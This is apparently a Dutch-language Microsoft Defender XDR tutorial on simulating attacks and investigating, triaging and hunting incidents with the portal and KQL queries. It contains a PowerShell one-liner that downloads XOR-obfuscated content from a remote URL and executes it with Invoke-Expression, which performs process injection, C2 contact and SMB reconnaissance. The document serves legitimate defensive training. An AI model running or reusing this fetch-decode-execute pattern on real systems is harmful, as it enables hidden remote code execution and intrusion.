Delen via

Onderzoeken en reageren met behulp van Microsoft Defender XDR

  • Artikel

Van toepassing op:

  • Microsoft Defender XDR

In dit artikel wordt het proces beschreven voor het maken van incidenten met aanvalssimulaties en zelfstudies en het gebruik van Microsoft Defender XDR om te onderzoeken en te reageren. Voordat u met dit proces begint, moet u ervoor zorgen dat u het algehele proces voor het uitvoeren en implementeren van Microsoft Defender XDR hebt bekeken en dat u ten minste enkele onderdelen van Microsoft Defender XDR hebt getest.

Een incident in Microsoft Defender XDR is een verzameling gecorreleerde waarschuwingen en bijbehorende gegevens die het verhaal van een aanval vormen. Microsoft 365-services en -apps maken waarschuwingen wanneer ze een verdachte of schadelijke gebeurtenis of activiteit detecteren. Afzonderlijke waarschuwingen bieden waardevolle aanwijzingen over een voltooide of doorlopende aanval. Aanvallen maken echter meestal gebruik van verschillende technieken tegen verschillende typen entiteiten, zoals apparaten, gebruikers en postvakken. Het resultaat is meerdere waarschuwingen voor meerdere entiteiten in uw tenant.

Opmerking

Als u nog niet bekend bent met beveiligingsanalyse en incidentrespons, raadpleegt u de walkthrough Reageren op uw eerste incident voor een rondleiding door een typisch proces van analyse, herstel en beoordeling na incidenten.

End-to-end-implementatie voor Microsoft Defender XDR

Dit is artikel 6 van 6 in een reeks om u te helpen bij het implementeren van de onderdelen van Microsoft Defender XDR, waaronder het onderzoeken van en reageren op incidenten.

Een diagram met het onderzoeken en reageren op incidenten in de testfase en het implementeren van Microsoft Defender XDR proces.

De artikelen in deze reeks komen overeen met de volgende fasen van end-to-end-implementatie:

Fase Koppelen
A. Start de testfase Start de testfase
B. Test en implementeer Microsoft Defender XDR onderdelen - Defender for Identity piloten en implementeren

- Test en implementeer Defender voor Office 365

- Defender voor Eindpunt testen en implementeren

- Test en implementeer Microsoft Defender for Cloud Apps
C. Bedreigingen onderzoeken en hierop reageren Incidentonderzoek en -reactie oefenen (dit artikel)

Tijdens uw testfase en implementatie kunt u op elk gewenst moment de reactiemogelijkheden en mogelijkheden voor geautomatiseerd onderzoek en herstel van Microsoft Defender XDR testen door een incident met een gesimuleerde aanval te maken en de Microsoft Defender portal te gebruiken om te onderzoeken en te reageren.

Werkstroom voor incidentonderzoek en -respons met behulp van Microsoft Defender XDR

Dit is de werkstroom voor het onderzoeken van en reageren op incidenten met behulp van Microsoft Defender XDR in uw productieomgeving.

Een diagram met de stappen voor het onderzoeken en reageren op incidenten.

Volg deze stappen:

  1. Aanvallen simuleren met de Microsoft Defender-portal
  2. Prioriteit geven aan incidenten
  3. Incidenten beheren
  4. Geautomatiseerd onderzoek en antwoord onderzoeken met het actiecentrum
  5. Geavanceerde opsporing gebruiken

Stap 1. Aanvallen simuleren met de Microsoft Defender-portal

De Microsoft Defender-portal heeft ingebouwde mogelijkheden voor het maken van gesimuleerde aanvallen op uw testomgeving:

training voor Defender voor Office 365 aanvalssimulatie

Defender voor Office 365 met Microsoft 365 E5 of Microsoft Defender voor Office 365 Plan 2 bevat training voor aanvalssimulatie voor phishingaanvallen. De basisstappen zijn:

  1. Een simulatie maken

    Zie Een phishing-aanval simuleren voor stapsgewijze instructies voor het maken en starten van een nieuwe simulatie.

  2. Een nettolading maken

    Zie Een aangepaste nettolading maken voor aanvalssimulatietraining voor stapsgewijze instructies voor het maken van een nettolading voor gebruik in een simulatie.

  3. Inzichten verkrijgen

    Zie Inzichten verkrijgen via aanvalssimulatietraining voor stapsgewijze instructies voor het verkrijgen van inzichten met rapportage.

Zie Simulaties voor meer informatie.

Zelfstudies voor Defender voor Eindpunt-aanvallen & simulaties

Dit zijn de Defender voor Eindpunt-simulaties van Microsoft:

  • Document drop backdoor
  • Geautomatiseerd onderzoek (backdoor)

Er zijn aanvullende simulaties van bronnen van derden. Er is ook een reeks zelfstudies.

Voor elke simulatie of zelfstudie:

  1. Download en lees het bijbehorende stapsgewijze document.

  2. Download het simulatiebestand. U kunt ervoor kiezen om het bestand of script te downloaden op het testapparaat, maar dit is niet verplicht.

  3. Voer het simulatiebestand of -script uit op het testapparaat volgens de instructies in het stapsgewijze document.

Zie Experience Microsoft Defender voor Eindpunt through simulated attack (Ervaring Microsoft Defender voor Eindpunt via een gesimuleerde aanval) voor meer informatie.

Een aanval simuleren met een geïsoleerde domeincontroller en clientapparaat (optioneel)

In deze optionele oefening voor het reageren op incidenten simuleert u een aanval op een geïsoleerde Active Directory Domain Services -domeincontroller (AD DS) en een Windows-apparaat met behulp van een PowerShell-script, waarna u het incident onderzoekt, herstelt en oplost.

Eerst moet u eindpunten toevoegen aan uw testomgeving.

Eindpunten voor testomgevingen toevoegen

Eerst moet u een geïsoleerde AD DS-domeincontroller en een Windows-apparaat toevoegen aan uw testomgeving.

  1. Controleer of de testomgevingtenant Microsoft Defender XDR heeft ingeschakeld.

  2. Controleer of uw domeincontroller:

  3. Controleer of uw testapparaat:

Als u tenant- en apparaatgroepen gebruikt, maakt u een toegewezen apparaatgroep voor het testapparaat en pusht u dit naar het hoogste niveau.

Een alternatief is het hosten van uw AD DS-domeincontroller en testapparaat als virtuele machines in Microsoft Azure-infrastructuurservices. U kunt de instructies in fase 1 van de testlabhandleiding voor gesimuleerde ondernemingen gebruiken, maar het maken van de virtuele app1-machine overslaan.

Dit is het resultaat.

Een diagram van de evaluatieomgeving met behulp van de testlabhandleiding voor gesimuleerde ondernemingen.

U simuleert een geavanceerde aanval die gebruikmaakt van geavanceerde technieken om u te verbergen voor detectie. De aanval somt geopende SMB-sessies (Server Message Block) op domeincontrollers op en haalt recente IP-adressen van apparaten van gebruikers op. Deze categorie aanvallen omvat meestal geen bestanden die zijn verwijderd op het apparaat van het slachtoffer en ze vinden alleen plaats in het geheugen. Ze 'leven van het land' met behulp van bestaande systeem- en beheerhulpprogramma's en injecteren hun code in systeemprocessen om hun uitvoering te verbergen. Met dergelijk gedrag kunnen ze detectie omzeilen en op het apparaat blijven staan.

In deze simulatie begint ons voorbeeldscenario met een PowerShell-script. In de praktijk kan een gebruiker worden misleid om een script uit te voeren of kan het script worden uitgevoerd vanaf een externe verbinding met een andere computer vanaf een eerder geïnfecteerd apparaat, wat aangeeft dat de aanvaller zich lateraal in het netwerk probeert te verplaatsen. Detectie van deze scripts kan lastig zijn omdat beheerders ook vaak scripts op afstand uitvoeren om verschillende beheeractiviteiten uit te voeren.

Een schermopname van de Fileless PowerShell-aanval met procesinjectie en SMB-verkenningsaanval.

Tijdens de simulatie injecteert de aanval shellcode in een schijnbaar onschuldig proces. Het scenario vereist het gebruik van notepad.exe. We hebben dit proces gekozen voor de simulatie, maar aanvallers richten zich waarschijnlijk op een langlopend systeemproces, zoals svchost.exe. De shellcode neemt vervolgens contact op met de C2-server (command-and-control) van de aanvaller om instructies te ontvangen over hoe te handelen. Het script probeert reconnaissance-query's uit te voeren op de domeincontroller (DC). Met Reconnaissance kan een aanvaller informatie krijgen over recente aanmeldingsgegevens van gebruikers. Zodra aanvallers deze informatie hebben, kunnen ze zich lateraal in het netwerk verplaatsen om naar een specifiek gevoelig account te gaan

Belangrijk

Voor optimale resultaten volgt u de instructies voor aanvalssimulatie zo nauwkeurig mogelijk.

De geïsoleerde aanvalssimulatie van AD DS-domeincontroller uitvoeren

De simulatie van het aanvalsscenario uitvoeren:

  1. Zorg ervoor dat uw testomgeving de geïsoleerde AD DS-domeincontroller en het Windows-apparaat bevat.

  2. Meld u aan bij het testapparaat met het testgebruikersaccount.

  3. Open een Windows PowerShell venster op het testapparaat.

  4. Kopieer het volgende simulatiescript:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    Opmerking

    Als u dit artikel opent in een webbrowser, kunt u problemen ondervinden bij het kopiëren van de volledige tekst zonder dat bepaalde tekens verloren gaan of extra regeleinden worden ingevoegd. Als dit het geval is, downloadt u dit document en opent u het in Adobe Reader.

  5. Plak en voer het gekopieerde script uit in het PowerShell-venster.

Opmerking

Als u PowerShell uitvoert met extern bureaubladprotocol (RDP), gebruikt u de opdracht Klembordtekst typen in de RDP-client omdat de sneltoets Ctrl-V of de methode met de rechtermuisknop niet werkt. Recente versies van PowerShell accepteren deze methode soms ook niet. Mogelijk moet u eerst kopiëren naar Kladblok in het geheugen, kopiëren naar de virtuele machine en vervolgens in PowerShell plakken.

Een paar seconden later wordt de Kladblok-app geopend. Er wordt een gesimuleerde aanvalscode in Kladblok geïnjecteerd. Houd het automatisch gegenereerde Kladblok-exemplaar geopend om het volledige scenario te ervaren.

De gesimuleerde aanvalscode probeert te communiceren met een extern IP-adres (simuleert de C2-server) en probeert vervolgens reconnaissance uit te voeren op de domeincontroller via SMB.

Dit bericht wordt weergegeven in de PowerShell-console wanneer dit script is voltooid:

ran NetSessionEnum against [DC Name] with return code result 0

Als u de functie Geautomatiseerde incidenten en reacties in actie wilt zien, houdt u het notepad.exe proces geopend. U ziet dat geautomatiseerde incidenten en reacties het Kladblok-proces stoppen.

Het incident voor de gesimuleerde aanval onderzoeken

Opmerking

Voordat we u door deze simulatie leiden, watch u de volgende video om te zien hoe incidentbeheer u helpt bij het samenvoegen van de gerelateerde waarschuwingen als onderdeel van het onderzoeksproces, waar u deze kunt vinden in de portal en hoe het u kan helpen bij uw beveiligingsbewerkingen:

Als u overschakelt naar de soc-analist, kunt u nu beginnen met het onderzoeken van de aanval in de Microsoft Defender-portal.

  1. Open de Microsoft Defender-portal.

  2. Selecteer in het navigatiedeelvenster Incidenten & Waarschuwingen > Incidenten.

  3. Het nieuwe incident voor de gesimuleerde aanval wordt weergegeven in de incidentwachtrij.

    Een schermopname van een voorbeeld van de wachtrij Incidenten.

De aanval onderzoeken als één incident

Microsoft Defender XDR correleert analyses en voegt alle gerelateerde waarschuwingen en onderzoeken van verschillende producten samen in één incidententiteit. Hierdoor toont Microsoft Defender XDR een breder aanvalsverhaal, waardoor de SOC-analist complexe bedreigingen kan begrijpen en erop kan reageren.

De waarschuwingen die tijdens deze simulatie worden gegenereerd, zijn gekoppeld aan dezelfde bedreiging en worden als gevolg hiervan automatisch samengevoegd als één incident.

Het incident bekijken:

  1. Open de Microsoft Defender-portal.

  2. Selecteer in het navigatiedeelvenster Incidenten & Waarschuwingen > Incidenten.

  3. Selecteer het nieuwste item door te klikken op de cirkel links van de naam van het incident. In een zijpaneel wordt aanvullende informatie over het incident weergegeven, inclusief alle gerelateerde waarschuwingen. Elk incident heeft een unieke naam die het beschrijft op basis van de kenmerken van de waarschuwingen die het bevat.

    De waarschuwingen die in het dashboard worden weergegeven, kunnen worden gefilterd op basis van serviceresources: Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, Microsoft Defender voor Eindpunt, Microsoft Defender XDR en Microsoft Defender voor Office 365.

  4. Selecteer Pagina incident openen voor meer informatie over het incident.

    Op de pagina Incident ziet u alle waarschuwingen en informatie met betrekking tot het incident. De informatie bevat de entiteiten en assets die betrokken zijn bij de waarschuwing, de detectiebron van de waarschuwingen (zoals Microsoft Defender for Identity of Microsoft Defender voor Eindpunt) en de reden waarom ze aan elkaar zijn gekoppeld. Als u de lijst met incidentenwaarschuwingen bekijkt, wordt de voortgang van de aanval weergegeven. Vanuit deze weergave kunt u de afzonderlijke waarschuwingen bekijken en onderzoeken.

    U kunt ook klikken op Incident beheren in het menu aan de rechterkant om het incident te taggen, het aan uzelf toe te wijzen en opmerkingen toe te voegen.

Gegenereerde waarschuwingen controleren

Laten we eens kijken naar enkele waarschuwingen die zijn gegenereerd tijdens de gesimuleerde aanval.

Opmerking

We doorlopen slechts enkele van de waarschuwingen die tijdens de gesimuleerde aanval zijn gegenereerd. Afhankelijk van de versie van Windows en de Microsoft Defender XDR producten die op uw testapparaat worden uitgevoerd, ziet u mogelijk meer waarschuwingen die in een iets andere volgorde worden weergegeven.

Een schermopname van een voorbeeld van een gegenereerde waarschuwing.

Waarschuwing: Verdachte procesinjectie waargenomen (bron: Microsoft Defender voor Eindpunt)

Geavanceerde aanvallers gebruiken geavanceerde en verborgen methoden om in het geheugen te blijven en zich te verbergen voor detectiehulpprogramma's. Een veelgebruikte techniek is om te werken vanuit een vertrouwd systeemproces in plaats van een schadelijk uitvoerbaar bestand, waardoor het moeilijk is voor detectiehulpprogramma's en beveiligingsbewerkingen om de schadelijke code te herkennen.

Om de SOC-analisten in staat te stellen deze geavanceerde aanvallen op te vangen, bieden deep memory sensoren in Microsoft Defender voor Eindpunt onze cloudservice een ongekende zichtbaarheid in verschillende technieken voor het injecteren van code tussen processen. In de volgende afbeelding ziet u hoe Defender voor Eindpunt is gedetecteerd en gewaarschuwd bij de poging om code in te voeren in notepad.exe.

Een schermopname van een voorbeeld van de waarschuwing voor het injecteren van een mogelijk schadelijke code.

Waarschuwing: onverwacht gedrag waargenomen door een proces dat wordt uitgevoerd zonder opdrachtregelargumenten (bron: Microsoft Defender voor Eindpunt)

Microsoft Defender voor Eindpunt detecties zijn vaak gericht op het meest voorkomende kenmerk van een aanvalstechniek. Deze methode zorgt voor duurzaamheid en verhoogt de lat voor aanvallers om over te schakelen naar nieuwere tactieken.

We gebruiken grootschalige leeralgoritmen om het normale gedrag van algemene processen binnen een organisatie en wereldwijd vast te stellen en watch wanneer deze processen afwijkend gedrag vertonen. Dit afwijkende gedrag geeft vaak aan dat overbodige code is geïntroduceerd en wordt uitgevoerd in een ander vertrouwd proces.

Voor dit scenario vertoont het proces notepad.exe abnormaal gedrag, waarbij communicatie met een externe locatie is vereist. Dit resultaat is onafhankelijk van de specifieke methode die wordt gebruikt om de schadelijke code te introduceren en uit te voeren.

Opmerking

Omdat deze waarschuwing is gebaseerd op machine learning-modellen waarvoor extra back-endverwerking is vereist, kan het enige tijd duren voordat u deze waarschuwing in de portal ziet.

U ziet dat de waarschuwingsdetails het externe IP-adres bevatten, een indicator die u kunt gebruiken als draaipunt om het onderzoek uit te breiden.

Selecteer het IP-adres in de waarschuwingsprocesstructuur om de pagina met details van het IP-adres weer te geven.

Een schermopname van een voorbeeld van onverwacht gedrag door een proces dat wordt uitgevoerd zonder opdrachtregelargumenten.

In de volgende afbeelding wordt de pagina met details van het geselecteerde IP-adres weergegeven (klik op IP-adres in de structuur van het waarschuwingsproces).

Een schermopname van een voorbeeld van de pagina met details van het IP-adres.

Waarschuwing: Reconnaissance van gebruikers en IP-adressen (SMB) (Bron: Microsoft Defender for Identity)

Opsomming met behulp van het SMB-protocol (Server Message Block) stelt aanvallers in staat recente aanmeldingsgegevens van gebruikers op te halen waarmee ze lateraal door het netwerk kunnen navigeren om toegang te krijgen tot een specifiek gevoelig account.

Bij deze detectie wordt een waarschuwing geactiveerd wanneer de opsomming van de SMB-sessie wordt uitgevoerd op een domeincontroller.

Een schermopname van een voorbeeld van Microsoft Defender for Identity waarschuwing voor verkenning van gebruikers- en IP-adressen.

Bekijk de tijdlijn van het apparaat met Microsoft Defender voor Eindpunt

Nadat u de verschillende waarschuwingen in dit incident hebt verkend, gaat u terug naar de incidentpagina die u eerder hebt onderzocht. Selecteer het tabblad Apparaten op de incidentpagina om de apparaten te controleren die betrokken zijn bij dit incident, zoals gerapporteerd door Microsoft Defender voor Eindpunt en Microsoft Defender for Identity.

Selecteer de naam van het apparaat waarop de aanval is uitgevoerd om de entiteitspagina voor dat specifieke apparaat te openen. Op die pagina ziet u waarschuwingen die zijn geactiveerd en gerelateerde gebeurtenissen.

Selecteer het tabblad Tijdlijn om de tijdlijn van het apparaat te openen en alle gebeurtenissen en gedragingen die op het apparaat zijn waargenomen in chronologische volgorde weer te geven, afgewisseld met de gegenereerde waarschuwingen.

Een schermopname van een voorbeeld van de tijdlijn van het apparaat met gedrag.

Het uitbreiden van enkele van de interessantere gedragingen biedt nuttige details, zoals processtructuren.

Schuif bijvoorbeeld omlaag totdat u de waarschuwingsgebeurtenis Verdachte procesinjectie hebt waargenomen. Selecteer de powershell.exe geïnjecteerd in notepad.exe proces-gebeurtenis eronder om de volledige processtructuur voor dit gedrag weer te geven onder de grafiek Gebeurtenisentiteiten in het zijvenster. Gebruik de zoekbalk om zo nodig te filteren.

Een schermopname van een voorbeeld van de processtructuur voor het gedrag voor het maken van geselecteerde PowerShell-bestanden.

De gebruikersgegevens controleren met Microsoft Defender for Cloud Apps

Selecteer op de pagina incident het tabblad Gebruikers om de lijst weer te geven met gebruikers die betrokken zijn bij de aanval. De tabel bevat aanvullende informatie over elke gebruiker, inclusief de onderzoeksprioriteitsscore van elke gebruiker.

Selecteer de gebruikersnaam om de profielpagina van de gebruiker te openen waar verder onderzoek kan worden uitgevoerd. Lees meer over het onderzoeken van riskante gebruikers.

Een schermopname van een voorbeeld Defender for Cloud Apps gebruikerspagina.

Geautomatiseerd onderzoek en herstel

Opmerking

Voordat we u door deze simulatie leiden, watch u de volgende video om vertrouwd te raken met wat geautomatiseerde zelfherstel is, waar u deze kunt vinden in de portal en hoe dit kan helpen bij uw beveiligingsbewerkingen:

Ga terug naar het incident in de Microsoft Defender portal. Op het tabblad Onderzoeken op de pagina Incident ziet u de geautomatiseerde onderzoeken die zijn geactiveerd door Microsoft Defender for Identity en Microsoft Defender voor Eindpunt. In de onderstaande schermopname ziet u alleen het geautomatiseerde onderzoek dat is geactiveerd door Defender for Endpoint. Defender voor Eindpunt herstelt standaard automatisch de artefacten in de wachtrij, waarvoor herstel is vereist.

Een schermopname van een voorbeeld van de geautomatiseerde onderzoeken met betrekking tot het incident.

Selecteer de waarschuwing die een onderzoek heeft geactiveerd om de pagina Details van onderzoek te openen. U ziet de volgende details:

  • Waarschuwing(en) die het geautomatiseerde onderzoek hebben geactiveerd.
  • Betrokken gebruikers en apparaten. Als er indicatoren worden gevonden op extra apparaten, worden deze extra apparaten ook weergegeven.
  • Lijst met bewijsmateriaal. De entiteiten die zijn gevonden en geanalyseerd, zoals bestanden, processen, services, stuurprogramma's en netwerkadressen. Deze entiteiten worden geanalyseerd op mogelijke relaties met de waarschuwing en geclassificeerd als goedaardig of schadelijk.
  • Bedreigingen gevonden. Bekende bedreigingen die tijdens het onderzoek zijn gevonden.

Opmerking

Afhankelijk van de timing kan het geautomatiseerde onderzoek nog steeds worden uitgevoerd. Wacht enkele minuten totdat het proces is voltooid voordat u het bewijs verzamelt en analyseert en de resultaten bekijkt. Vernieuw de pagina Details van onderzoek om de meest recente bevindingen op te halen.

Een schermopname van een voorbeeld van de pagina Details van onderzoek.

Tijdens het geautomatiseerde onderzoek heeft Microsoft Defender voor Eindpunt het notepad.exe-proces geïdentificeerd, dat is geïnjecteerd als een van de artefacten waarvoor herstel is vereist. Defender voor Eindpunt stopt automatisch de verdachte procesinjectie als onderdeel van het geautomatiseerde herstel.

U ziet notepad.exe verdwijnen uit de lijst met actieve processen op het testapparaat.

Het incident oplossen

Nadat het onderzoek is voltooid en bevestigd dat het moet worden hersteld, lost u het incident op.

Selecteer op de pagina Incidentde optie Incident beheren. Stel de status in op Incident oplossen en selecteer Waar-waarschuwing voor de classificatie en Beveiligingstests voor de bepaling.

Een schermopname van een voorbeeld van de pagina incidenten met het geopende deelvenster Incident beheren, waar u op de schakeloptie kunt klikken om het incident op te lossen.

Wanneer het incident is opgelost, worden alle bijbehorende waarschuwingen in de Microsoft Defender portal en de gerelateerde portals opgelost.

Hiermee worden aanvalssimulaties verpakt voor incidentanalyse, geautomatiseerd onderzoek en incidentoplossing.

Stap 2. Prioriteit geven aan incidenten

U komt bij de incidentwachtrij vanuit Incidenten & waarschuwingen > Incidenten bij het snel starten van de Microsoft Defender-portal. Hier is een voorbeeld.

Een schermopname van de sectie Incidenten & waarschuwingen in de Microsoft Defender portal.

In de sectie Meest recente incidenten en waarschuwingen ziet u een grafiek van het aantal ontvangen waarschuwingen en incidenten dat in de afgelopen 24 uur is gemaakt.

Als u de lijst met incidenten wilt onderzoeken en prioriteit wilt geven aan hun belang voor toewijzing en onderzoek, kunt u het volgende doen:

  • Configureer aanpasbare kolommen (selecteer Kolommen kiezen) om u inzicht te geven in verschillende kenmerken van het incident of de betrokken entiteiten. Dit helpt u bij het nemen van een weloverwogen beslissing met betrekking tot de prioriteitstelling van incidenten voor analyse.

  • Gebruik filteren om u te richten op een specifiek scenario of een specifieke bedreiging. Het toepassen van filters op de incidentwachtrij kan helpen bepalen welke incidenten onmiddellijke aandacht vereisen.

Selecteer filters in de standaardwachtrij voor incidenten om een deelvenster Filters weer te geven, van waaruit u een specifieke set incidenten kunt opgeven. Hier is een voorbeeld.

Een schermopname van het deelvenster Filters van de sectie Incidenten & waarschuwingen in de Microsoft Defender-portal.

Zie Incidenten prioriteren voor meer informatie.

Stap 3. Incidenten beheren

U kunt incidenten beheren vanuit het deelvenster Incident beheren voor een incident. Hier is een voorbeeld.

Een schermopname van het deelvenster Incident beheren van de sectie Incidenten & waarschuwingen in de Microsoft Defender-portal.

U kunt dit deelvenster weergeven via de koppeling Incident beheren op de:

  • Deelvenster Eigenschappen van een incident in de incidentwachtrij.
  • Overzichtspagina van een incident.

Hier volgen de manieren waarop u uw incidenten kunt beheren:

  • De naam van het incident bewerken

    Wijzig de automatisch toegewezen naam op basis van de best practices van uw beveiligingsteam.

  • Incidenttags toevoegen

    Voeg tags toe die uw beveiligingsteam gebruikt om incidenten te classificeren, die later kunnen worden gefilterd.

  • Het incident toewijzen

    Wijs deze toe aan een gebruikersaccountnaam, die later kan worden gefilterd.

  • Een incident oplossen

    Sluit het incident nadat het is hersteld.

  • De classificatie en bepaling ervan instellen

    Classificeer en selecteer het bedreigingstype wanneer u een incident oplost.

  • Opmerkingen toevoegen

    Gebruik opmerkingen voor voortgang, notities of andere informatie op basis van de aanbevolen procedures van uw beveiligingsteam. De volledige opmerkingsgeschiedenis is beschikbaar via de optie Opmerkingen en geschiedenis op de detailpagina van een incident.

Zie Incidenten beheren voor meer informatie.

Stap 4. Geautomatiseerd onderzoek en antwoord onderzoeken met het actiecentrum

Afhankelijk van hoe geautomatiseerde onderzoeks- en reactiemogelijkheden zijn geconfigureerd voor uw organisatie, worden herstelacties automatisch of alleen na goedkeuring door uw beveiligingsteam uitgevoerd. Alle acties, in behandeling of voltooid, worden weergegeven in het Actiecentrum, waarin in behandeling en voltooide herstelacties voor uw apparaten, e-mail & samenwerkingsinhoud en identiteiten op één locatie worden vermeld.

Hier is een voorbeeld.

Een schermopname van het Unified Action Center in de Microsoft Defender portal.

Vanuit het Actiecentrum kunt u acties in behandeling selecteren en deze vervolgens goedkeuren of afwijzen in het flyoutvenster. Hier is een voorbeeld.

Een schermopname van het deelvenster met de opties voor het goedkeuren of afwijzen van een actie in de Microsoft Defender-portal.

In behandeling zijnde acties zo snel mogelijk goedkeuren (of weigeren), zodat uw geautomatiseerde onderzoeken tijdig kunnen doorgaan en voltooien.

Zie Geautomatiseerd onderzoek en respons enActiecentrum voor meer informatie.

Stap 5. Geavanceerde opsporing gebruiken

Opmerking

Voordat we u door de geavanceerde opsporingssimulatie leiden, watch u de volgende video om geavanceerde opsporingsconcepten te begrijpen, te zien waar u deze kunt vinden in de portal en te weten te komen hoe het u kan helpen bij uw beveiligingsbewerkingen.


Als de optionele bestandsloze PowerShell-aanvalssimulatie een echte aanval was die de toegangsfase voor referenties al had bereikt, kunt u op elk gewenst moment in het onderzoek geavanceerde opsporing gebruiken om proactief te zoeken naar gebeurtenissen en records in het netwerk met behulp van wat u al weet van de gegenereerde waarschuwingen en betrokken entiteiten.

Op basis van informatie in de waarschuwing Gebruikers- en IP-adresverkenning (SMB) kunt u bijvoorbeeld de IdentityDirectoryEvents tabel gebruiken om alle SMB-sessie-inventarisatie-gebeurtenissen te vinden of meer detectieactiviteiten te vinden in verschillende andere protocollen in Microsoft Defender for Identity gegevens met behulp van de IdentityQueryEvents tabel.

Vereisten voor opsporingsomgeving

Er is één intern postvak en apparaat vereist voor deze simulatie. U hebt ook een extern e-mailaccount nodig om het testbericht te verzenden.

  1. Controleer of uw tenant Microsoft Defender XDR heeft ingeschakeld.

  2. Identificeer een doelpostvak dat moet worden gebruikt voor het ontvangen van e-mail.

    • Dit postvak moet worden bewaakt door Microsoft Defender voor Office 365

    • Het apparaat van vereiste 3 moet toegang hebben tot dit postvak

  3. Een testapparaat configureren:

    a. Zorg ervoor dat u Windows 10 versie 1903 of hoger gebruikt.

    b. Voeg het testapparaat toe aan het testdomein.

    c. Schakel Microsoft Defender Antivirus in. Als u problemen ondervindt bij het inschakelen van Microsoft Defender Antivirus, raadpleegt u dit onderwerp voor probleemoplossing.

    d. Onboarden naar Microsoft Defender voor Eindpunt.

De simulatie uitvoeren

  1. Verzend vanuit een extern e-mailaccount een e-mail naar het postvak dat is geïdentificeerd in stap 2 van de sectie Vereisten voor de opsporingsomgeving. Voeg een bijlage toe die is toegestaan via een bestaand e-mailfilterbeleid. Dit bestand hoeft niet schadelijk of uitvoerbaar te zijn. Voorgestelde bestandstypen zijn .pdf, .exe (indien toegestaan) of een Office-documenttype, zoals een Word-bestand.

  2. Open de verzonden e-mail vanaf het apparaat dat is geconfigureerd zoals gedefinieerd in stap 3 van de sectie Vereisten voor de opsporingsomgeving. Open de bijlage of sla het bestand op het apparaat op.

Ga op jacht

  1. Open de Microsoft Defender-portal.

  2. Selecteer Opsporing > geavanceerde opsporing in het navigatiedeelvenster.

  3. Bouw een query die begint met het verzamelen van e-mail gebeurtenissen.

    1. Selecteer Query > nieuw.

    2. Dubbelklik in de Email groepen onder Geavanceerde opsporing op E-mailGebeurtenissen. U ziet dit in het queryvenster.

      EmailEvents

    3. Wijzig het tijdsbestek van de query in de afgelopen 24 uur. Ervan uitgaande dat het e-mailbericht dat u hebt verzonden toen u de bovenstaande simulatie uitvoerde, in de afgelopen 24 uur was, wijzigt u anders het tijdsbestek indien nodig.

    4. Selecteer Query uitvoeren. Mogelijk hebt u verschillende resultaten, afhankelijk van uw testomgeving.

      Opmerking

      Zie de volgende stap voor filteropties om het retourneren van gegevens te beperken.

      Een schermopname van de pagina Geavanceerde opsporing in de Microsoft Defender portal.

      Opmerking

      Geavanceerde opsporing geeft queryresultaten weer als gegevens in tabelvorm. U kunt er ook voor kiezen om de gegevens in andere indelingen weer te geven, zoals grafieken.

    5. Bekijk de resultaten en kijk of u de e-mail kunt identificeren die u hebt geopend. Het kan tot twee uur duren voordat het bericht wordt weergegeven in geavanceerde opsporing. Als u de resultaten wilt beperken, kunt u de where-voorwaarde aan uw query toevoegen om alleen te zoeken naar e-mailberichten met 'yahoo.com' als hun SenderMailFromDomain. Hier is een voorbeeld.

      EmailEvents
| where SenderMailFromDomain == "yahoo.com"

    6. Klik op de resulterende rijen van de query, zodat u de record kunt inspecteren.

      Een schermopname van de sectie Record inspecteren van de pagina Geavanceerde opsporing in de Microsoft Defender-portal.

  4. Nu u hebt gecontroleerd of u het e-mailbericht kunt zien, voegt u een filter toe voor de bijlagen. Richt u op alle e-mailberichten met bijlagen in de omgeving. Voor deze simulatie richt u zich op binnenkomende e-mailberichten, niet op e-mailberichten die vanuit uw omgeving worden verzonden. Verwijder alle filters die u hebt toegevoegd om uw bericht te vinden en voeg '| toe where AttachmentCount > 0 and EmailDirection == "Inbound""

    In de volgende query ziet u het resultaat met een kortere lijst dan uw eerste query voor alle e-mail gebeurtenissen:

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"

  5. Voeg vervolgens de informatie over de bijlage (zoals: bestandsnaam, hashes) toe aan uw resultatenset. Voeg hiervoor de tabel EmailAttachmentInfo toe. De algemene velden die moeten worden gebruikt om deel te nemen, zijn in dit geval NetworkMessageId en RecipientObjectId.

    De volgende query bevat ook een extra regel '| project-rename EmailTimestamp=Timestamp" waarmee u kunt bepalen welke tijdstempel is gerelateerd aan de e-mail versus tijdstempels die betrekking hebben op bestandsacties die u in de volgende stap gaat toevoegen.

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId

  6. Gebruik vervolgens de SHA256-waarde uit de tabel EmailAttachmentInfo om DeviceFileEvents (bestandsacties die zijn uitgevoerd op het eindpunt) voor die hash te zoeken. Het algemene veld hier is de SHA256-hash voor de bijlage.

    De resulterende tabel bevat nu details van het eindpunt (Microsoft Defender voor Eindpunt), zoals de naam van het apparaat, welke actie is uitgevoerd (in dit geval gefilterd om alleen FileCreated-gebeurtenissen op te nemen) en waar het bestand is opgeslagen. De accountnaam die aan het proces is gekoppeld, wordt ook opgenomen.

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
| join DeviceFileEvents on SHA256
| where ActionType == "FileCreated"

    U hebt nu een query gemaakt waarmee alle binnenkomende e-mailberichten worden geïdentificeerd waarin de gebruiker de bijlage heeft geopend of opgeslagen. U kunt deze query ook verfijnen om te filteren op specifieke afzenderdomeinen, bestandsgrootten, bestandstypen, enzovoort.

  7. Functies zijn een speciaal soort join, waarmee u meer TI-gegevens over een bestand kunt ophalen, zoals de prevalentie, informatie over ondertekenaar en verlener, enzovoort. Gebruik de verrijking van de functie FileProfile() voor meer informatie over het bestand:

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
